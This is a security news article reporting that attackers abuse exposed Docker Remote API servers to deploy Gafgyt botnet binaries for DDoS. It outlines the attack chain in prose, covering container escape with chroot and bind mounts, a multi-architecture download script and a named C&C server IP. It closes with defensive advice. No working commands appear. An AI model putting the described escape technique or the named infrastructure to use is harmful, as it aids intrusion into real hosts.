Hackers Hijack Docker APIs to Spread Gafgyt Malware

Threat actors are exploiting misconfigured Docker Remote API servers by deploying the Gafgyt malware, potentially enabling them to launch DDoS attacks against these vulnerable systems.

Gafgyt, initially targeting IoT devices, has expanded its attack scope to include Docker Remote API servers, demonstrating its adaptability and potential for wider, more sophisticated cyberattacks.

An attacker made an attempt to launch a Gafgyt botnet attack by deploying a binary that was based on Rust and was given the name “rbot” within a Docker container that was using the Alpine Linux image. 

Attack chain

They leveraged a container with the Alpine image, using chroot and bind mounts to gain root access to the host system, compromising its security and potentially enabling further malicious activities. 

By compromising a container, it is downloading and executing the Gafgyt botnet binary, “rbot,” containing hardcoded C&C server details, potentially enabling remote control of the infected system.

The malicious bot, upon successful C2C&C server communication, processes the received instructions and initiates a multi-vector DDoS attack, employing UDP, TCP, and HTTP protocols.

HTTP connection creation code

An attempt for a second container deployment using an Alpine Docker image, this time leveraging the “atlas.i586” Gafgyt binary to potentially execute malicious activities within the target environment.

They exploited system vulnerabilities to elevate privileges, likely using `chroot` and `bind` commands and then deployed a botnet binary named “atlas.i586”, potentially leveraging the “0day” argument for configuration or execution purposes, though no specific 0day exploit was identified. 

It is controlled by a C&C server and executes DDoS attacks using various protocols (UDP, ICMP, HTTP, SYN, etc.) based on commands received from the server, likely exploiting a zero-day vulnerability (indicated by the “Name:0day” argument).

C&C address

The malware attempts to identify the victim’s local IP address by initiating a DNS query to Google’s DNS server, which forces the system to select a network interface, and the malware extracts the associated local IP address using the `getsockname()` function.

According to Trend Micro, an attacker attempted to deploy a Gafgyt botnet variant by executing a shell script that downloads and executes binaries tailored for various system architectures, following an initial failed container deployment.

Local IP address discovery

By leveraging the “cve.sh” script, it downloads botnet binaries for different architectures from their C&C server (178.215.238.31) and executes them on compromised hosts, potentially exploiting a vulnerability. 

To safeguard Docker Remote API servers, implement robust access controls and authentication, and diligently monitor for anomalies, promptly addressing any suspicious activity.

Implement rigorous container security practices by strictly avoiding privileged mode, reviewing container images and configurations prior to deployment, and providing comprehensive security training to personnel managing Docker Remote API servers, addressing potential attack vectors.

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here